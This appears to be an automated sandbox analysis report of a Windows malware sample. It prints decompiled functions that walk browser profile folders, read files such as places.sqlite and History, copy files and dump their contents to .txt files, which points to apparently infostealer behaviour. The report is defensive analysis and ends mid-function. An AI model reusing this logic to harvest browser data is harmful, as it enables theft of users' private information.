                                                                      0x00412ddc
                                                                      0x00412ddf
                                                                      0x00412df7
                                                                      0x00412e0d
                                                                      0x00412e10
                                                                      0x00412e10
                                                                      0x00412e13
                                                                      0x00412e29
                                                                      0x00412e2e
                                                                      0x00412e34
                                                                      0x00412e44
                                                                      0x00412e49
                                                                      0x00412e5a
                                                                      0x00412e6c
                                                                      0x00412e74
                                                                      0x00412e75
                                                                      0x00412e7a
                                                                      0x00412e7d
                                                                      0x00412e84
                                                                      0x00412e8a
                                                                      0x00412e8d
                                                                      0x00412ea3
                                                                      0x00412ea8
                                                                      0x00412eae
                                                                      0x00412ebe
                                                                      0x00412ecf
                                                                      0x00412ee0
                                                                      0x00412eeb
                                                                      0x00412eec
                                                                      0x00412eef
                                                                      0x00412ef4
                                                                      0x00412ef7
                                                                      0x00412f0d
                                                                      0x00412f12
                                                                      0x00412f18
                                                                      0x00412f28
                                                                      0x00412f39
                                                                      0x00412f44
                                                                      0x00412f45
                                                                      0x00412f45
                                                                      0x00412f4c
                                                                      0x00412f4f
                                                                      0x00412f4f
                                                                      0x00412f6e
                                                                      0x00412f7a
                                                                      0x00412f81
                                                                      0x00412f84
                                                                      0x00412f87
                                                                      0x00412f97
                                                                      0x00412fa2
                                                                      0x00412fb2
                                                                      0x00412fbd
                                                                      0x00412fcd
                                                                      0x00412fdf

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID: .txt$\*.*$\History
                                                                      • API String ID: 1974802433-2232271174
                                                                      • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                      • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                      • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                      • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t103;
				intOrPtr _t108;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t141;

				_t138 = __esi;
				_t137 = __edi;
				_t106 = __ebx;
				_t140 = _t141;
				_push(__ecx);
				_t108 = 0x51;
				do {
					_push(0);
					_push(0);
					_t108 = _t108 - 1;
				} while (_t108 != 0);
				_push(_t108);
				_t1 =  &_v8;
				 *_t1 = _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t140);
				_push(0x413276);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x4132a0);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x4132a0);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t106, 0x104) != 0) {
						_push(_t140);
						_push(0x4131ea);
						_push( *[fs:eax]);
						 *[fs:eax] = _t141;
						_push(_v8);
						_push(0x4132a0);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(L"\\places.sqlite");
						E00403E1C();
						E0041256C(_v644, _t106,  &_v640, _t137, _t138);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x4132a0);
						_push(_v12);
						_push(E004132CC);
						E00403D10( &_v660, 0x104,  &(_v616.cFileName));
						_push(_v660);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v652, _v656);
						_pop(_t103);
						E0040DCE8(_t103, _t106, _v652, _t137, _t138);
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t123);
				 *[fs:eax] = _t123;
				_push(E0041327D);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                      0x0041303c
                                                                      0x0041303c
                                                                      0x0041303c
                                                                      0x0041303d
                                                                      0x0041303f
                                                                      0x00413040
                                                                      0x00413045
                                                                      0x00413045
                                                                      0x00413047
                                                                      0x00413049
                                                                      0x00413049
                                                                      0x0041304c
                                                                      0x0041304d
                                                                      0x0041304d
                                                                      0x00413050
                                                                      0x00413051
                                                                      0x00413052
                                                                      0x00413053
                                                                      0x00413056
                                                                      0x00413059
                                                                      0x0041305f
                                                                      0x00413067
                                                                      0x0041306f
                                                                      0x00413076
                                                                      0x00413077
                                                                      0x0041307c
                                                                      0x0041307f
                                                                      0x00413097
                                                                      0x004130ad
                                                                      0x004130b0
                                                                      0x004130b0
                                                                      0x004130b3
                                                                      0x004130c9
                                                                      0x004130ce
                                                                      0x004130d4
                                                                      0x004130e4
                                                                      0x004130e9
                                                                      0x004130fa
                                                                      0x0041310c
                                                                      0x00413114
                                                                      0x00413115
                                                                      0x0041311a
                                                                      0x0041311d
                                                                      0x00413120
                                                                      0x00413123
                                                                      0x00413139
                                                                      0x0041313e
                                                                      0x00413144
                                                                      0x00413154
                                                                      0x00413165
                                                                      0x00413176
                                                                      0x00413181
                                                                      0x00413182
                                                                      0x00413185
                                                                      0x0041318a
                                                                      0x0041318d
                                                                      0x004131a3
                                                                      0x004131a8
                                                                      0x004131ae
                                                                      0x004131be
                                                                      0x004131cf
                                                                      0x004131da
                                                                      0x004131db
                                                                      0x004131e2
                                                                      0x004131e5
                                                                      0x004131e5
                                                                      0x00413204
                                                                      0x00413210
                                                                      0x00413217
                                                                      0x0041321a
                                                                      0x0041321d
                                                                      0x0041322d
                                                                      0x00413238
                                                                      0x00413248
                                                                      0x00413253
                                                                      0x00413263
                                                                      0x00413275

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID: .txt$\*.*$\places.sqlite
                                                                      • API String ID: 1974802433-3919338718
                                                                      • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                      • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                      • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                      • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404C15 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
				 *0x41b00c = 2;
				 *0x41c010 = 0x4010b8;
				 *0x41c014 = 0x4010c0;
				 *0x41c036 = 2;
				 *0x41c000 = E00404568;
				if(E00402A94() != 0) {
					_t3 = E00402AC4();
				}
				E00402B88(_t3);
				 *0x41c03c = 0xd7b0;
				 *0x41c208 = 0xd7b0;
				 *0x41c3d4 = 0xd7b0;
				 *0x41c02c = GetCommandLineA();
				 *0x41c028 = E00401180();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x41c5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x41c020 = _t11;
				return _t11;
			}





                                                                      0x00404c15
                                                                      0x00404c1a
                                                                      0x00404c1f
                                                                      0x00404c21
                                                                      0x00404c28
                                                                      0x00404c32
                                                                      0x00404c3c
                                                                      0x00404c43
                                                                      0x00404c54
                                                                      0x00404c56
                                                                      0x00404c56
                                                                      0x00404c5b
                                                                      0x00404c60
                                                                      0x00404c69
                                                                      0x00404c72
                                                                      0x00404c80
                                                                      0x00404c8a
                                                                      0x00404c9e
                                                                      0x00404cd7
                                                                      0x00404ca0
                                                                      0x00404cae
                                                                      0x00404cc6
                                                                      0x00404cb0
                                                                      0x00404cb0
                                                                      0x00404cb0
                                                                      0x00404cae
                                                                      0x00404cdc
                                                                      0x00404ce1
                                                                      0x00404ce6

                                                                      APIs
                                                                        • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                                                                        • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                                                                      • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                      • GetVersion.KERNEL32 ref: 00404C8F
                                                                      • GetVersion.KERNEL32 ref: 00404CA0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                        • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                        • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                        • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                      • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                        • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3734044017-0
                                                                      • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                      • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                      • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                      • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 42%
                                                                      			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				void* _t143;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t181;
				intOrPtr _t188;
				intOrPtr _t210;
				intOrPtr _t211;

				_t208 = __esi;
				_t207 = __edi;
				_t162 = __ebx;
				_t210 = _t211;
				_push(__ecx);
				_t164 = 0x56;
				do {
					_push(0);
					_push(0);
					_t164 = _t164 - 1;
				} while (_t164 != 0);
				_t1 =  &_v8;
				 *_t1 = _t164;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t210);
				_push(0x411542);
				_push( *[fs:eax]);
				 *[fs:eax] = _t211;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x41156c);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x41156c);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t162, 0x104) != 0) {
						_push(_t210);
						_push(0x411480);
						_push( *[fs:eax]);
						 *[fs:eax] = _t211;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(0x41156c);
							E0040813C(0x61,  &_v652);
							_push(_v652);
							E00403E1C();
							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
							_push(_v664);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v656, _v660);
							_pop(_t160);
							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
						}
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
							_push(_v680);
							_push(0x41156c);
							E0040813C(0x61,  &_v684);
							_push(_v684);
							E00403E1C();
							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
							E0040377C( &_v668, _v672);
							_push(_v668);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
							_push(_v696);
							_push(E00411574);
							_push(E0041158C);
							_push(E0041158C);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v688, _v692);
							_pop(_t143);
							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t181);
				 *[fs:eax] = _t181;
				_push(E0041154C);
				E00403B98( &_v696, 2);
				E004034E4( &_v688);
				E00403B98( &_v684, 4);
				E004034E4( &_v668);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}



































                                                                      0x004111c4
                                                                      0x004111c4
                                                                      0x004111c4
                                                                      0x004111c5
                                                                      0x004111c7
                                                                      0x004111c8
                                                                      0x004111cd
                                                                      0x004111cd
                                                                      0x004111cf
                                                                      0x004111d1
                                                                      0x004111d1
                                                                      0x004111d4
                                                                      0x004111d4
                                                                      0x004111d7
                                                                      0x004111d8
                                                                      0x004111d9
                                                                      0x004111da
                                                                      0x004111dd
                                                                      0x004111e0
                                                                      0x004111e6
                                                                      0x004111ee
                                                                      0x004111f6
                                                                      0x004111fd
                                                                      0x004111fe
                                                                      0x00411203
                                                                      0x00411206
                                                                      0x0041121e
                                                                      0x00411234
                                                                      0x00411237
                                                                      0x00411237
                                                                      0x0041123a
                                                                      0x00411250
                                                                      0x00411255
                                                                      0x0041125b
                                                                      0x0041126b
                                                                      0x00411270
                                                                      0x00411281
                                                                      0x00411293
                                                                      0x0041129b
                                                                      0x0041129c
                                                                      0x004112a1
                                                                      0x004112a4
                                                                      0x004112ab
                                                                      0x004112b1
                                                                      0x004112b4
                                                                      0x004112ca
                                                                      0x004112cf
                                                                      0x004112d5
                                                                      0x004112e5
                                                                      0x004112ea
                                                                      0x004112fb
                                                                      0x0041130c
                                                                      0x0041131d
                                                                      0x00411328
                                                                      0x00411329
                                                                      0x0041132c
                                                                      0x00411331
                                                                      0x00411334
                                                                      0x0041134a
                                                                      0x0041134f
                                                                      0x00411355
                                                                      0x00411365
                                                                      0x00411376
                                                                      0x00411381
                                                                      0x00411382
                                                                      0x00411382
                                                                      0x0041138b
                                                                      0x00411391
                                                                      0x00411394
                                                                      0x004113aa
                                                                      0x004113af
                                                                      0x004113b5
                                                                      0x004113c5
                                                                      0x004113ca
                                                                      0x004113db
                                                                      0x004113ec
                                                                      0x004113fd
                                                                      0x00411408
                                                                      0x00411409
                                                                      0x0041140c
                                                                      0x00411411
                                                                      0x00411414
                                                                      0x0041142a
                                                                      0x0041142f
                                                                      0x00411435
                                                                      0x0041143a
                                                                      0x0041143f
                                                                      0x00411444
                                                                      0x00411454
                                                                      0x00411465
                                                                      0x00411470
                                                                      0x00411471
                                                                      0x00411471
                                                                      0x00411478
                                                                      0x0041147b
                                                                      0x0041147b
                                                                      0x0041149a
                                                                      0x004114a6
                                                                      0x004114ad
                                                                      0x004114b0
                                                                      0x004114b3
                                                                      0x004114c3
                                                                      0x004114ce
                                                                      0x004114de
                                                                      0x004114e9
                                                                      0x004114f9
                                                                      0x00411504
                                                                      0x00411514
                                                                      0x0041151f
                                                                      0x0041152f
                                                                      0x00411541

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                        • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                                                                        • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                      • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                      • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                      • String ID: .txt$\*.*
                                                                      • API String ID: 4269597168-2615687548
                                                                      • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                      • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                      • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                      • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t109;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t130;
				intOrPtr _t144;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_t113 = __ebx + 1;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t115 = 0x52;
				do {
					_push(0);
					_push(0);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
				_t3 =  &_v8;
				 *_t3 = _t115;
				_push(_t113);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t3;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t113, 0x104) != 0) {
						_push(_t148);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t113,  &_v640, _t145, _t146);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t109);
						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
						_pop(_t144);
						 *[fs:eax] = _t144;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t130);
				 *[fs:eax] = _t130;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                      0x0041158c
                                                                      0x0041158c
                                                                      0x0041158c
                                                                      0x0041158d
                                                                      0x0041158f
                                                                      0x00411591
                                                                      0x00411593
                                                                      0x00411594
                                                                      0x00411599
                                                                      0x00411599
                                                                      0x0041159b
                                                                      0x0041159d
                                                                      0x0041159d
                                                                      0x004115a0
                                                                      0x004115a0
                                                                      0x004115a3
                                                                      0x004115a4
                                                                      0x004115a5
                                                                      0x004115a6
                                                                      0x004115a9
                                                                      0x004115ac
                                                                      0x004115b2
                                                                      0x004115ba
                                                                      0x004115c2
                                                                      0x004115c9
                                                                      0x004115ca
                                                                      0x004115cf
                                                                      0x004115d2
                                                                      0x004115ea
                                                                      0x00411600
                                                                      0x00411603
                                                                      0x00411603
                                                                      0x00411606
                                                                      0x0041161c
                                                                      0x00411621
                                                                      0x00411627
                                                                      0x00411637
                                                                      0x0041163c
                                                                      0x0041164d
                                                                      0x0041165f
                                                                      0x00411667
                                                                      0x00411668
                                                                      0x0041166d
                                                                      0x00411670
                                                                      0x00411673
                                                                      0x00411676
                                                                      0x0041168c
                                                                      0x00411691
                                                                      0x00411697
                                                                      0x004116a7
                                                                      0x004116ac
                                                                      0x004116bd
                                                                      0x004116ce
                                                                      0x004116df
                                                                      0x004116ea
                                                                      0x004116eb
                                                                      0x004116ee
                                                                      0x004116f3
                                                                      0x004116f6
                                                                      0x0041170c
                                                                      0x00411711
                                                                      0x00411717
                                                                      0x00411727
                                                                      0x00411738
                                                                      0x00411743
                                                                      0x00411744
                                                                      0x0041174b
                                                                      0x0041174e
                                                                      0x0041174e
                                                                      0x0041176d
                                                                      0x00411779
                                                                      0x00411780
                                                                      0x00411783
                                                                      0x00411786
                                                                      0x00411796
                                                                      0x004117a1
                                                                      0x004117b1
                                                                      0x004117bc
                                                                      0x004117cc
                                                                      0x004117de

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                      • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                      • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstFreeNextString
                                                                      • String ID: .txt$\*.*
                                                                      • API String ID: 2008072091-2615687548
                                                                      • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                      • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                      • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                      • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 45%
                                                                      			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t107;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;

				_t143 = __esi;
				_t142 = __edi;
				_t110 = __ebx;
				_t145 = _t146;
				_push(__ecx);
				_t112 = 0x52;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_t1 =  &_v8;
				 *_t1 = _t112;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t145);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t110, 0x104) != 0) {
						_push(_t145);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t110,  &_v640, _t142, _t143);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t107);
